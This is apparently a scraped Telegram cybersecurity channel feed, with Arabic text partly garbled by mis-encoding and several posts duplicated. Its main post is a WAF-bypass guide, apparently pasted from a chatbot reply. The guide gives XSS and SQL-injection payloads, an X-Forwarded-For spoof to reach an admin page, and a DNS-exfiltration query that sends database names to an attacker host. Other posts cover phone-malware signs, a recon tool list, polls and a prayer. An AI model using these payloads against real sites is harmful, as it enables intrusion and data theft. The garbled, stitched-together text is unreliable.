ููุณู ุจุนุฏ ู ุง ุชุนู ู encode url
%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alert
xss%3Eุจุงูููุฏ ููุชูุง ุจูุดุชุบู ุนุงุฏู ููู ููุณ ูุงูู
ุทูุจ ููุฑุถ ู ุด ุงุดุชุบู ๐ค
ุชุงูู ุฎุทูู :
ุชูุงุนุจ ูู headers
ุงู ุงูุชูุงุนุจ ูู ุงูููุฏุฑ ุฏู ุ
ุดูู ุชูุงุนุจ ูู ุงูููุฏุฑ ุจุชููู ุงูู ุชุญุงูู
ุชุบูุฑ ุญู ุงูู ุฒู X-Original-URL
ุทูุจ ุงุฒุงู ๐ค
ุจุณูุทู
GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1
ุทูุจ ููุฑุถ ุงููุง ู ุด ุงุดุชุบูุช ูุนู ู ุงู ุ
ููุฌู ูู ุฎุทูู ุชุงูุชู :
ูุฌุฑุจ ูุนุฏู ู HTTP ู ู ูู ูุฎูู
TRACE
ู ูุดุชุบู ู ุนุงูุง
ู ุซุงู
HEAD /admin HTTP/1.1
ุงู
TRACE /admin HTTP/1.1
ุจุฏู get ุงู post
ุทูุจ ููุชุฑุถ ู ุด ุงุดุชุบูุช ๐ค
ููุฌู ูู ุทุฑููู ุงูุฑุงุจุนู :
ุงูุฎุทูู ุฏู ุดุจู ุงูู ูุงุชุช ูููู ุงูุช
ูุชุฌุฑุจ ุชุนุฏู ุงูู ูู ูููู ู ุซูุง xml
ู ุซุงู :
/admin.json
ุทูุจ ููุชุฑุถ ู ุด ุงุดุชุบูุช ๐๐ค
ููููู ุจุฑุฏู ูู ุฎุทูู ุฎุงู ุณู ๐
ุงูุฎุทูู ุงูุฎุงู ุณู :
ู ุฏู ุจุณูุทู ูู waf ุจูููู ู ุด ุนุงุฑู
ููุฑู ุจูู ุงูุญุฑูู ุงูุตุบูุฑู ู ู ุญุฑูู
ุงููุจูุฑ
ุจุชูุฒุฑ ูุง ุณุจุงูุฏุฑ ูุนูู waf ุทูุน ุบุจู ูุฏ
ููููู ุงูู ู ุซุงู
<script>alert(1)</script>
ุฏุง ููุฏ xss ุนุงุฏู
<Script>alert(1)</Script>
ูู ููุณ ุงูููุฏ ุจููุณ ุงูุทุฑููู
ุทูุจ ููุชุฑุถ ู ุด ุงุดุชุบูุช ๐ค
ููููู ูู ุทุฑููู ุณุงุฏุณู :
ุงูุทุฑููู ุฏู ู ู ูู ุชุชูุงุนุจ ู dns ุฎุงุต
ุจู ู ููุน
ู ุซุงู :
SELECT LOAD_FILE(CONCAT('\\\\attacker.com\\',database()));
ุฏุง ุจุงูููุฏ ุนุงุฏู
SELECT * FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0);
ุจุนุฏ ุชุนุฏูู
ุทูุจ ูู ูุฌุญุช ุ
ุงุฎุฑ ุทุฑููู ู ููุง ุงูุณุงุจุนู :
ุดูู ุงุตุฏุงุฑ waf ู ุฏูุฑ ุนูู cve ูู
ู ุฌุฑุจ cve ูููู ูุญุฏ ู ุง ุชูุฏุฑ ุชุนู ู bypass
ุดูุฑุง ู ูุฑุงุฆู ุงูู ูุงู ุญุงููุช ุงููู ุฎููู ู ู ูู ุจูู ุดุฆ ๐ค
โค1
Bypassing WAF (Web Application Firewall): A Practical Guide
Disclaimer:
1. This article is for educational purposes only. The author is not responsible for any misuse of the information provided.
2. You may share the knowledge but do not copy this article without permission from the author.
---
Introduction
Let's imagine a scenario where a hacker, whom weโll call Hamasah, discovers a SQL Injection vulnerability on a target website.
Quick Explanation:
SQL Injection allows attackers to inject malicious SQL queries into an applicationโs database to extract sensitive information.
However, when Hamasah attempts to exploit the vulnerability, the attack gets blocked by a WAF (Web Application Firewall).
So, what should Hamasah do? ๐ค
Let's explore different WAF bypass techniques step by step.
---
1. Encoding the Payload
One of the simplest ways to bypass a WAF is by encoding the payload so that it doesn't match the WAFโs predefined signatures.
Example: XSS Encoding
Original Payload:
<script>alert(1)</script>
Encoded Payload (URL Encoding):
%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alertxss%3E
In this case, the WAF might fail to detect the encoded payload while the browser will still interpret and execute it normally.
---
2. Header Manipulation
Some WAFs rely on analyzing request headers to detect malicious traffic. Modifying headers can help bypass them.
Example: Spoofing X-Forwarded-For
Some WAFs only block specific IPs. You can try bypassing it by adding a X-Forwarded-For header to appear as a trusted source.
GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1
If the WAF is improperly configured, it might think the request is coming from the localhost and allow it through.
---
3. HTTP Method Manipulation
Instead of using standard HTTP methods like GET or POST, trying other methods such as HEAD or TRACE might work.
Example:
HEAD /admin HTTP/1.1
or
TRACE /admin HTTP/1.1
Some WAFs do not inspect these methods as strictly as GET/POST.
---
4. Switching to Alternative Data Formats
If the WAF filters traditional form-based requests, try sending data in JSON or XML format instead.
Example:
Instead of:
username=admin' OR 1=1 --
Try sending it as JSON:
{ "username": "admin' OR 1=1 --", "password": "password" }
Some WAFs are not designed to analyze JSON requests properly, which can allow the payload to bypass security.
---
5. Case Manipulation
Many WAFs perform case-sensitive filtering, so modifying the letter case can sometimes bypass them.
Example: XSS Attack Case Manipulation
Normal Payload:
<script>alert(1)</script>
Bypass Attempt:
<Script>alert(1)</Script>
If the WAF only blocks lowercase "script", the uppercase version might go through.
---
6. Exploiting DNS-based Exfiltration
Some WAFs block direct responses but still allow outbound connections, which can be used to extract data.
Example:
Instead of trying to display sensitive data on the screen, you can send it to an external server via DNS requests:
SELECT LOAD_FILE(CONCAT('\\\\attacker.com\\', database()));
or
SELECT * FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0);
If the WAF does not filter outbound traffic, the database information might be leaked via DNS requests.
---
7. Finding WAF Vulnerabilities (CVE Exploits)
The ultimate method for bypassing a WAF is to find vulnerabilities in the WAF itself.
Steps:
1. Identify the WAF using tools like WAFW00F:
wafw00f http://target.com
2. Search for CVEs related to that WAF.
3. Exploit known vulnerabilities to bypass or disable the WAF.
For example, if the target is using an outdated version of a cloud-based WAF, you might find a known CVE that allows bypassing its protection.
---
Conclusion
WAF bypassing is an ongoing challenge that requires creativity and persistence. Combining multiple techniques often yields the best results.
If one method doesn't work, try another approachโbecause thereโs always a way!
Would you like me to help you turn this into a video script or add more advanced techniques?
Disclaimer:
1. This article is for educational purposes only. The author is not responsible for any misuse of the information provided.
2. You may share the knowledge but do not copy this article without permission from the author.
---
Introduction
Let's imagine a scenario where a hacker, whom weโll call Hamasah, discovers a SQL Injection vulnerability on a target website.
Quick Explanation:
SQL Injection allows attackers to inject malicious SQL queries into an applicationโs database to extract sensitive information.
However, when Hamasah attempts to exploit the vulnerability, the attack gets blocked by a WAF (Web Application Firewall).
So, what should Hamasah do? ๐ค
Let's explore different WAF bypass techniques step by step.
---
1. Encoding the Payload
One of the simplest ways to bypass a WAF is by encoding the payload so that it doesn't match the WAFโs predefined signatures.
Example: XSS Encoding
Original Payload:
<script>alert(1)</script>
Encoded Payload (URL Encoding):
%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alertxss%3E
In this case, the WAF might fail to detect the encoded payload while the browser will still interpret and execute it normally.
---
2. Header Manipulation
Some WAFs rely on analyzing request headers to detect malicious traffic. Modifying headers can help bypass them.
Example: Spoofing X-Forwarded-For
Some WAFs only block specific IPs. You can try bypassing it by adding a X-Forwarded-For header to appear as a trusted source.
GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1
If the WAF is improperly configured, it might think the request is coming from the localhost and allow it through.
---
3. HTTP Method Manipulation
Instead of using standard HTTP methods like GET or POST, trying other methods such as HEAD or TRACE might work.
Example:
HEAD /admin HTTP/1.1
or
TRACE /admin HTTP/1.1
Some WAFs do not inspect these methods as strictly as GET/POST.
---
4. Switching to Alternative Data Formats
If the WAF filters traditional form-based requests, try sending data in JSON or XML format instead.
Example:
Instead of:
username=admin' OR 1=1 --
Try sending it as JSON:
{ "username": "admin' OR 1=1 --", "password": "password" }
Some WAFs are not designed to analyze JSON requests properly, which can allow the payload to bypass security.
---
5. Case Manipulation
Many WAFs perform case-sensitive filtering, so modifying the letter case can sometimes bypass them.
Example: XSS Attack Case Manipulation
Normal Payload:
<script>alert(1)</script>
Bypass Attempt:
<Script>alert(1)</Script>
If the WAF only blocks lowercase "script", the uppercase version might go through.
---
6. Exploiting DNS-based Exfiltration
Some WAFs block direct responses but still allow outbound connections, which can be used to extract data.
Example:
Instead of trying to display sensitive data on the screen, you can send it to an external server via DNS requests:
SELECT LOAD_FILE(CONCAT('\\\\attacker.com\\', database()));
or
SELECT * FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0);
If the WAF does not filter outbound traffic, the database information might be leaked via DNS requests.
---
7. Finding WAF Vulnerabilities (CVE Exploits)
The ultimate method for bypassing a WAF is to find vulnerabilities in the WAF itself.
Steps:
1. Identify the WAF using tools like WAFW00F:
wafw00f http://target.com
2. Search for CVEs related to that WAF.
3. Exploit known vulnerabilities to bypass or disable the WAF.
For example, if the target is using an outdated version of a cloud-based WAF, you might find a known CVE that allows bypassing its protection.
---
Conclusion
WAF bypassing is an ongoing challenge that requires creativity and persistence. Combining multiple techniques often yields the best results.
If one method doesn't work, try another approachโbecause thereโs always a way!
Would you like me to help you turn this into a video script or add more advanced techniques?
โค1
ุชุญุจ ู
ุญุชูู ุจูุฑู ูููู ุงู : What do you want the content to be
Anonymous Poll
63%
Red team : ูุฑูู ุงููุฌูู
17%
Blue team : ูุฑูู ุงูุฏูุงุน
20%
Ai : ุฐูุงุก ุงุตุทูุงุนู
โค3
ุงุฒุงู ุงุนุฑู ุงูู ู
ุฎุชุฑู
ุบุงูุจูุง ุงููุงุชู ุจูุนูู ูุฃู ุจุนุถ ุงูุชุทุจููุงุช ุจุชุณุชููู ูู ูุฉ ูุจูุฑุฉ ู ู ุงูุฅูุชุฑูุช. ูุญู ุงูู ุดููุฉ ุฏูุ ููุณุชุญุณู ุชุญู ูู ุชุทุจูู ุฒู GlassWire ุนูุดุงู ุชุฑุงูุจ ุงุณุชููุงู ุงูุจูุงูุงุช. ูู ูุงุญุธุช ุฅู ูู ุชุทุจูู ุจูุณุชููู ุจูุงูุงุช ุจุดูู ุบูุฑ ุทุจูุนู ู ู ุบูุฑ ุณุจุจ ูุงุถุญุ ุฏู ู ู ูู ูููู ุจุณุจุจ ุจุฑูุงู ุฌ ุถุงุฑ ุจูุฑุชุจุท ุจุงูุฅูุชุฑูุช.
ูู ูููุช ุชุทุจูู ุบุฑูุจุ ุงุฏุฎู ุนูู ุฅุนุฏุงุฏุงุช ุงููุงุชู ุนูุดุงู ุชุฏูุฑ ุนููู. ูููุ ูุฃู ุจุนุถ ุงูุจุฑุงู ุฌ ุงูุถุงุฑุฉ ุจุชููู ู ุฎููุฉุ ุฒู ู ุง ู ู ูู ุชูุงูู ุชุทุจูู ู ุงููุด ุงุณู ุฃู ุตูุฑุฉ. ูู ุงูุญุงูุฉ ุฏูุ ูุงุฒู ุชู ุณุญู
ุจุนุถ ุงูุชุทุจููุงุช ู ุด ุฏุงูู ูุง ู ุตู ู ุฉ ุนูุดุงู ุชุณุฑู ู ููุงุชูุ ููููุง ู ู ูู ุชุนุฑุถ ุฅุนูุงูุงุช ุจุดูู ู ูุฑุทุ ุญุชู ูุงูุช ู ุด ูุงุชุญ ุงูุชุทุจูู. ุงููุฏู ู ู ุงูุฅุนูุงูุงุช ุฏู ุบุงูุจูุง ุจูููู ุงูุฑุจุญ ุงูู ุงุฏู. ูู ุจุฏุฃุช ุชูุงูู ุฅุนูุงูุงุช ุนุดูุงุฆูุฉ ูู ูุงุฌูุฉ ุงููุงุชู ู ู ุบูุฑ ุณุจุจุ ุฏู ุนูุงู ุฉ ูุงุถุญุฉ ุฅู ูู ุจุฑูุงู ุฌ ุถุงุฑ ุนูู ุฌูุงุฒู.
https://t.me/SpiderCodeCommunity1
ูุชุงุจู : @Gg22rf โค๏ธ
ุบุงูุจูุง ุงููุงุชู ุจูุนูู ูุฃู ุจุนุถ ุงูุชุทุจููุงุช ุจุชุณุชููู ูู ูุฉ ูุจูุฑุฉ ู ู ุงูุฅูุชุฑูุช. ูุญู ุงูู ุดููุฉ ุฏูุ ููุณุชุญุณู ุชุญู ูู ุชุทุจูู ุฒู GlassWire ุนูุดุงู ุชุฑุงูุจ ุงุณุชููุงู ุงูุจูุงูุงุช. ูู ูุงุญุธุช ุฅู ูู ุชุทุจูู ุจูุณุชููู ุจูุงูุงุช ุจุดูู ุบูุฑ ุทุจูุนู ู ู ุบูุฑ ุณุจุจ ูุงุถุญุ ุฏู ู ู ูู ูููู ุจุณุจุจ ุจุฑูุงู ุฌ ุถุงุฑ ุจูุฑุชุจุท ุจุงูุฅูุชุฑูุช.
ูู ูููุช ุชุทุจูู ุบุฑูุจุ ุงุฏุฎู ุนูู ุฅุนุฏุงุฏุงุช ุงููุงุชู ุนูุดุงู ุชุฏูุฑ ุนููู. ูููุ ูุฃู ุจุนุถ ุงูุจุฑุงู ุฌ ุงูุถุงุฑุฉ ุจุชููู ู ุฎููุฉุ ุฒู ู ุง ู ู ูู ุชูุงูู ุชุทุจูู ู ุงููุด ุงุณู ุฃู ุตูุฑุฉ. ูู ุงูุญุงูุฉ ุฏูุ ูุงุฒู ุชู ุณุญู
ุจุนุถ ุงูุชุทุจููุงุช ู ุด ุฏุงูู ูุง ู ุตู ู ุฉ ุนูุดุงู ุชุณุฑู ู ููุงุชูุ ููููุง ู ู ูู ุชุนุฑุถ ุฅุนูุงูุงุช ุจุดูู ู ูุฑุทุ ุญุชู ูุงูุช ู ุด ูุงุชุญ ุงูุชุทุจูู. ุงููุฏู ู ู ุงูุฅุนูุงูุงุช ุฏู ุบุงูุจูุง ุจูููู ุงูุฑุจุญ ุงูู ุงุฏู. ูู ุจุฏุฃุช ุชูุงูู ุฅุนูุงูุงุช ุนุดูุงุฆูุฉ ูู ูุงุฌูุฉ ุงููุงุชู ู ู ุบูุฑ ุณุจุจุ ุฏู ุนูุงู ุฉ ูุงุถุญุฉ ุฅู ูู ุจุฑูุงู ุฌ ุถุงุฑ ุนูู ุฌูุงุฒู.
https://t.me/SpiderCodeCommunity1
ูุชุงุจู : @Gg22rf โค๏ธ
Telegram
SPIDER1CODE
Spider1Code is the first Arab community that brings together cybersecurity artificial intelligence, and more โจ๐ค
๐2
ุงููููู
ููู ูุฃูู ุบุฒุฉ ุนูููุง ููุตูุฑูุงุ ูุจุฏูู ุฎูููู
ุฃู
ููุง.
ุงููููู ุงุฌุนู ูุฃูู ุบุฒุฉ ุงููุตุฑุฉ ูุงูุนุฒุฉ ูุงูุบูุจุฉ ูุงูููุฉ ูุงูููุจุฉ.
ุชุนุฒ ุนูููุง ุบุฒุฉ ..ูุนุฒ ุนูููุง ุนุฒุงุคูุง.. ุงููููู ุบุฒุฉ ุญุชู ุชุทู ุฆู.
ุงููููู ุฅูู ุบุฒุฉ ูู ุญูู ุงู ูุง ุญูู ู ููุง ุณููุงู.
ุงููููู ูุณุฃูู ููุญุฉ ู ู ููุญุงุช ุฑุญู ุชูู ุชูู ุงูุชู ูุง ุชูุจูู ุจุคุณูุง ุ ููุง ุญุฒููุง ุ ููุง ุถูููุง ุ ููุง ูุฃุณูุง ุฃุชุช ุนููู ุฅูุง ุฌุนูุชู ูุฑุฌูุง ููุฑุญูุง ูุง ุงููู ... ูุงุฑุจ ุจู ุชุทูุจู ุงูุฎูุงุทุฑ ูู ู ุนูุฏู ุชุชุญููู ุงูุฃู ููุงุช ุงุณุชูุฏุนูุงู ุดูุฆุงู ูู ุฎูุงุทุฑูุง ุ ูุญููู ููุง ูุง ุฑุจ ุงูุนุงูู ูู.
ุงููููู ุงุฌุนู ูุฃูู ุบุฒุฉ ุงููุตุฑุฉ ูุงูุนุฒุฉ ูุงูุบูุจุฉ ูุงูููุฉ ูุงูููุจุฉ.
ุชุนุฒ ุนูููุง ุบุฒุฉ ..ูุนุฒ ุนูููุง ุนุฒุงุคูุง.. ุงููููู ุบุฒุฉ ุญุชู ุชุทู ุฆู.
ุงููููู ุฅูู ุบุฒุฉ ูู ุญูู ุงู ูุง ุญูู ู ููุง ุณููุงู.
ุงููููู ูุณุฃูู ููุญุฉ ู ู ููุญุงุช ุฑุญู ุชูู ุชูู ุงูุชู ูุง ุชูุจูู ุจุคุณูุง ุ ููุง ุญุฒููุง ุ ููุง ุถูููุง ุ ููุง ูุฃุณูุง ุฃุชุช ุนููู ุฅูุง ุฌุนูุชู ูุฑุฌูุง ููุฑุญูุง ูุง ุงููู ... ูุงุฑุจ ุจู ุชุทูุจู ุงูุฎูุงุทุฑ ูู ู ุนูุฏู ุชุชุญููู ุงูุฃู ููุงุช ุงุณุชูุฏุนูุงู ุดูุฆุงู ูู ุฎูุงุทุฑูุง ุ ูุญููู ููุง ูุง ุฑุจ ุงูุนุงูู ูู.
๐3
Forwarded from SPIDER SECURITY
ุจูุฑู ุงูู ููู
ู
ู ูููู ุงููุฏุฑ ูููู ุงููุฏุฑ ู
ู
ูู ุชููู ู
ู ุงุฎุฑ ุนุดุฑ ุชูุงู
๐๐ป
โค3
ุนุดุงู ุจุตุฑุงุญู ู
ุญุชุงุฑ ุงูุฒู ุงู
Anonymous Poll
13%
CVE
33%
Roadmap
54%
Bug bounty tools for web
ุจ ู
ูุงุณุจู ูุตูููุง ู 140 ููุฒู ูููู
ุงูุถู ุงุฏูุงุช ุฑูููู
Spider Tools
-----------------------
spider recon
----------------------
1 - Amass
2 - Subfinder
3 - Assetfinder
4 - Shodan.io.com
5 -Censys.com
6 - Waybackurls
7 - Hakrawler
8 - Nmap ( ุฎูููุง ุชูุญุต ูู ุงูุฑูุงุจุท ู ู ูู )
9 - naabu
10 - httpx ( ุนูุดุงู ุชุดูู ุงูุฑูุงุจุท ุงูุดุบุงูู )
11 - WhatWeb
12 - Wappalyzer ( ุงุถุงูู ูู ูุงูุฑ ูููุณ )
13 - Dirsearch
14 - Arjun
15 - fuff ( ูุฒู ู ุงุณูุฑุจุช ูููุง )
16 - wfuzz ( ุฒู fuff )
17 - Burp Suite pro
โ๐ปโ๐ปโ๐ปโ๐ปโ๐ป
( ุถูู extension ุงูู ูุฌูุฏู ู ู ุชุฌุฑ ุงูุจุฑุจ ุงุฎุชุงุฑ ุงู ุฎู ุณ ูุฌูู ู ููู ู ุถูู burp bounty free ู ุญุท ุงุณูุฑุจุชุงุช burp bounty pro )
18 - zap proxy
19 - Wireshark
20 - feroxbuster
21 - Knockpy
22 - Gobuster ( ุฒู fuff )
23 -builtwith.com
24 - nuclei
25 - xsrfprobe
26 - webpwn3r ( ุจุชุงุนุช ุงุจุฑุงููู ุญุฌุงุฒู )
27 - RED_HAWK
28 - gbounty
( Spider Osint )
29 - maltego
30 - Spiderfoot
| Spider exploit |
31 - SQLmap
32 - metasploit
33 - XSStrike
34 - wpscan
35 -https://github.com/vavkamil/awesome-bugbounty-tools
โ๐ปโ๐ปโ๐ปโ๐ปโ๐ป
( ุฏูู ุงุฏูุงุช ุฒูุงุฏู ุนุดุงู ูู ูู ุซุบุฑู ูููุชูุง ู ูุงุฏูุงุช ู ุด ูุงูุนู ู ุนู )
Spider Tools
-----------------------
spider recon
----------------------
1 - Amass
2 - Subfinder
3 - Assetfinder
4 - Shodan.io.com
5 -Censys.com
6 - Waybackurls
7 - Hakrawler
8 - Nmap ( ุฎูููุง ุชูุญุต ูู ุงูุฑูุงุจุท ู ู ูู )
9 - naabu
10 - httpx ( ุนูุดุงู ุชุดูู ุงูุฑูุงุจุท ุงูุดุบุงูู )
11 - WhatWeb
12 - Wappalyzer ( ุงุถุงูู ูู ูุงูุฑ ูููุณ )
13 - Dirsearch
14 - Arjun
15 - fuff ( ูุฒู ู ุงุณูุฑุจุช ูููุง )
16 - wfuzz ( ุฒู fuff )
17 - Burp Suite pro
โ๐ปโ๐ปโ๐ปโ๐ปโ๐ป
( ุถูู extension ุงูู ูุฌูุฏู ู ู ุชุฌุฑ ุงูุจุฑุจ ุงุฎุชุงุฑ ุงู ุฎู ุณ ูุฌูู ู ููู ู ุถูู burp bounty free ู ุญุท ุงุณูุฑุจุชุงุช burp bounty pro )
18 - zap proxy
19 - Wireshark
20 - feroxbuster
21 - Knockpy
22 - Gobuster ( ุฒู fuff )
23 -builtwith.com
24 - nuclei
25 - xsrfprobe
26 - webpwn3r ( ุจุชุงุนุช ุงุจุฑุงููู ุญุฌุงุฒู )
27 - RED_HAWK
28 - gbounty
( Spider Osint )
29 - maltego
30 - Spiderfoot
| Spider exploit |
31 - SQLmap
32 - metasploit
33 - XSStrike
34 - wpscan
35 -https://github.com/vavkamil/awesome-bugbounty-tools
โ๐ปโ๐ปโ๐ปโ๐ปโ๐ป
( ุฏูู ุงุฏูุงุช ุฒูุงุฏู ุนุดุงู ูู ูู ุซุบุฑู ูููุชูุง ู ูุงุฏูุงุช ู ุด ูุงูุนู ู ุนู )
GitHub
GitHub - vavkamil/awesome-bugbounty-tools: A curated list of various bug bounty tools
A curated list of various bug bounty tools. Contribute to vavkamil/awesome-bugbounty-tools development by creating an account on GitHub.
On the occasion of reaching 140, Iโm sharing with you the best reconnaissance tools!
Spider Tools
---
Spider Recon
---
1 - Amass
2 - Subfinder
3 - Assetfinder
4 - Shodan.io
5 - Censys.com
6 - Waybackurls
7 - Hakrawler
8 - Nmap (Make it scan all URLs in a file)
9 - Naabu
10 - Httpx (To check for live URLs)
11 - WhatWeb
12 - Wappalyzer (Firefox extension)
13 - Dirsearch
14 - Arjun
15 - Ffuf (Youโll need a script for it)
16 - Wfuzz (Similar to Ffuf)
17 - Burp Suite Pro
โ๐ปโ๐ปโ๐ปโ๐ปโ๐ป
(Add the extensions from the Burp store, choose the five-star ones, add Burp Bounty Free, and import Burp Bounty Pro scripts.)
18 - ZAP Proxy
19 - Wireshark
20 - Feroxbuster
21 - Knockpy
22 - Gobuster (Similar to Ffuf)
23 - BuiltWith.com
24 - Nuclei
25 - XSRFProbe
26 - WebPwn3r (By Ibrahim Hegazy)
27 - RED_HAWK
28 - GBounty
Spider OSINT
29 - Maltego
30 - SpiderFoot
Spider Exploit
31 - SQLmap
32 - Metasploit
33 - XSStrike
34 - WPScan
35 - Awesome Bug Bounty Tools
โ๐ปโ๐ปโ๐ปโ๐ปโ๐ป
(Additional tools in case you find a vulnerability and need extra resources.)
Spider Tools
---
Spider Recon
---
1 - Amass
2 - Subfinder
3 - Assetfinder
4 - Shodan.io
5 - Censys.com
6 - Waybackurls
7 - Hakrawler
8 - Nmap (Make it scan all URLs in a file)
9 - Naabu
10 - Httpx (To check for live URLs)
11 - WhatWeb
12 - Wappalyzer (Firefox extension)
13 - Dirsearch
14 - Arjun
15 - Ffuf (Youโll need a script for it)
16 - Wfuzz (Similar to Ffuf)
17 - Burp Suite Pro
โ๐ปโ๐ปโ๐ปโ๐ปโ๐ป
(Add the extensions from the Burp store, choose the five-star ones, add Burp Bounty Free, and import Burp Bounty Pro scripts.)
18 - ZAP Proxy
19 - Wireshark
20 - Feroxbuster
21 - Knockpy
22 - Gobuster (Similar to Ffuf)
23 - BuiltWith.com
24 - Nuclei
25 - XSRFProbe
26 - WebPwn3r (By Ibrahim Hegazy)
27 - RED_HAWK
28 - GBounty
Spider OSINT
29 - Maltego
30 - SpiderFoot
Spider Exploit
31 - SQLmap
32 - Metasploit
33 - XSStrike
34 - WPScan
35 - Awesome Bug Bounty Tools
โ๐ปโ๐ปโ๐ปโ๐ปโ๐ป
(Additional tools in case you find a vulnerability and need extra resources.)
ุชุนุงูู ูุชููู
ุงุฒุงู ุชุชุนูู
ุงูุฌููุฒู โจ
ูุญุธู ุจุณ ูู ูุงูุฌููุฒู ู ูู ุงุตูุง ุ
ุทุจุนุง ูุนุฒูุฒู ุงูุณูุงู ุฏุง ูู ููุช ุณุงูุชูู
ูู ุณูู 900 ููุช ููููู ูุง ุจุณ ูู 2025 ู ูู ุฌุฏุง
ุจุต ูุงูุฌููุฒู ุจุนูุฏ ุนู ุงูุณุงูุจุฑ ุณูููุฑุชู ูุง ูู ุจูุฏุฎู ูู ูุฐุง ู ุฌุงู ุชุนููู ู ู ู ููู
ูุงู ู ุงูุณูุจุฑุงูู ู ูุถูุน ุงูููู
ุชุญุฐูุฑ : ู ู ููุน ุณุฑูู ุงูู ูุงู ููู ูุญู ูู ุงุฎุฏ ุงูู ุนููู ุงุช ู ุน ุฐูุฑ ุงูู ุตุฏุฑ
ุทูุจ ูุนุฒูุฒู ุงูู ุญุงุฌู ูุงูุฌููุฒู ูู
ู ุณุชููุงุช ุงูุช ู ุงูุช ุจุชุชุนูู ูู ู ุฏุฑุณู
ููุช ุจุชุงุฎุฏ A B C ุตุญ ุ
ูุญุงู ูู ูููุช ุตุญ ูุจูู ุงูุช ูุฏ ุนุฏูุช ู ุณุชูู A1
ุงู ูู A1
ุฏุง ูุนุฒูุฒู ู ุณุชูู ู ู ู ุณุชููุงุช ูุงูุฌููุฒู ู ู ุณุชููุงุช ูุงูุฌููุฒู ู ุนู ููู ุนุดุงู ุชุญุฏุฏ ู ุณุชูุงู ูุจู ู ุง ุชุจุฏุงุก ุชุชุนูู ุงูุฌููุฒู ุญุฏุฏ ู ุณุชูุงู ูู
ุทูุจ ุงุญุฏุฏ ุงุฒุงู ๐ค
ุจุณูุทู ุงุฏุฎู ุนูู ููุฏูู ุฏุง
https://youtu.be/NzTEZgFEr9k?si=ZZsHgaYqwcSzfolX
ุจุนุฏูุง ุจุนุฏ ู ุง ุชุญุฏุฏ ุงุจุฏุงุก ุดูู ุงูุช ู ุณุชูู ุงู ููุชุฑุถ ุงูู ู ุณุชูู A2
ุชุจุฏุงุก ุชููู ุฌู ู ุจุณูุทู ู ุน ุญูุธ ููู ุงุช ุงูุนุงุฏูู ุฒู ู ุซูุง
ุชูุงุญู : apple
ุงูุง : I
ุงุฑูุฏ : want
ุชุจุฏุงุก ุจู ููู ุงุช ุชููู ุฌู ูู
I want apple
ุงูุง ุงุฑูุฏ ุชูุงุญู
ุทูุจ ุงุชุนูู ุงุฒุงู ุจุณูููู ุ
ูุฌุจูู ู ุซุงู ุญูู ูุนุฒูุฒู ุงูุทูู ูู ุง ูุฌู ูุชุนูู ุงูููุงู ุจูุดูู ูุงุดุฎุงุต ุงูู ู ุน ุจูุชููู ู ุงุฒุงู ูุนูู ููุชุฑุถ ุจูุชููู ู ุนุฑุจู ุงูุทูู ูุชููู ุนุฑุจู
ุทุจู ู ุซุงู ุฏุง ุนููู ููู ุทูู ุจุธุจุท ูุชุจุฏุงุก ุชุฎูู ูู ุญุงุฌู ุจู ูุบู ุงูุฌููุฒูู
ู ุซูุง ุจุชูุฑุฌ ุนูู ูููู ุจูุบู ูุงูุฌููุฒู ู ุด ุชุณุชุฎุฏู ู ุชุฑุฌู
ุทูุจ ุงูุง ุงููู ูููู ุงุฒุงู ุ
ููู ุงุช ุงูู ุงูุช ู ุด ูุงูู ู ุฑูุญ ุฏูุฑ ุนูููุง ู ุงุญูุธูุง ุงููุงุณ ุงูู ุชุบุฑุจูู ู ู ุฏูู ุนุฑุจูู ุจูุดููู ุงูุชุฑุฌู ู ุจู ูุบู ูุงูุฌููุฒู ุนุดุงู ูู ุง ูุดููู ุงููุชุงุจู ู ูู ุง ู ุด ูุงูู ูู ุงูููุงู ูุฏูุฑู ู ูููู ู
ุทูุจ ุงูุง ูุณุชูุงุฏ ุงู ูู ุง ุงุชุนูู ุงูุฌููุฒู ูู ูุงู ู ุงูุณูุจุฑุงูู
ุจุนูุฏ ุนูู ูุชุนุฑู ุชูุชุจ ู ูุชููู ุงูู ุดุงูู ( error ) ู ูุชุนุฑู ุชุญู ุงูู ุดููู ุจููุณู
ุจุณ ูู ู ุฌุงูุงุช ู ุญุชุงุฌู ูุบุงุช ุฒู malware dev ( ุตูุงุนู ุงูุจุฑู ุฌูุงุช ุงูุฎุจูุซุฉ )
ูุฒู ุชุจูู ู ุชุนูู ุงูุฌููุฒู ุนุดุงู ุชุนุฑู ุชูุชุจ ูุงููุงุฏ .
ุญุงููุช ุงููู ู ูู ุจูู ุดุฆ ุดูุฑุง ูู ูุฑุงุฆู ุงูู ูุงู ุงุชู ูู ุชุดูุฑู ุงูููุงู ู ุงุดูููู ุนูู ุฎูุฑ ๐ค
ูุญุธู ุจุณ ูู ูุงูุฌููุฒู ู ูู ุงุตูุง ุ
ุทุจุนุง ูุนุฒูุฒู ุงูุณูุงู ุฏุง ูู ููุช ุณุงูุชูู
ูู ุณูู 900 ููุช ููููู ูุง ุจุณ ูู 2025 ู ูู ุฌุฏุง
ุจุต ูุงูุฌููุฒู ุจุนูุฏ ุนู ุงูุณุงูุจุฑ ุณูููุฑุชู ูุง ูู ุจูุฏุฎู ูู ูุฐุง ู ุฌุงู ุชุนููู ู ู ู ููู
ูุงู ู ุงูุณูุจุฑุงูู ู ูุถูุน ุงูููู
ุชุญุฐูุฑ : ู ู ููุน ุณุฑูู ุงูู ูุงู ููู ูุญู ูู ุงุฎุฏ ุงูู ุนููู ุงุช ู ุน ุฐูุฑ ุงูู ุตุฏุฑ
ุทูุจ ูุนุฒูุฒู ุงูู ุญุงุฌู ูุงูุฌููุฒู ูู
ู ุณุชููุงุช ุงูุช ู ุงูุช ุจุชุชุนูู ูู ู ุฏุฑุณู
ููุช ุจุชุงุฎุฏ A B C ุตุญ ุ
ูุญุงู ูู ูููุช ุตุญ ูุจูู ุงูุช ูุฏ ุนุฏูุช ู ุณุชูู A1
ุงู ูู A1
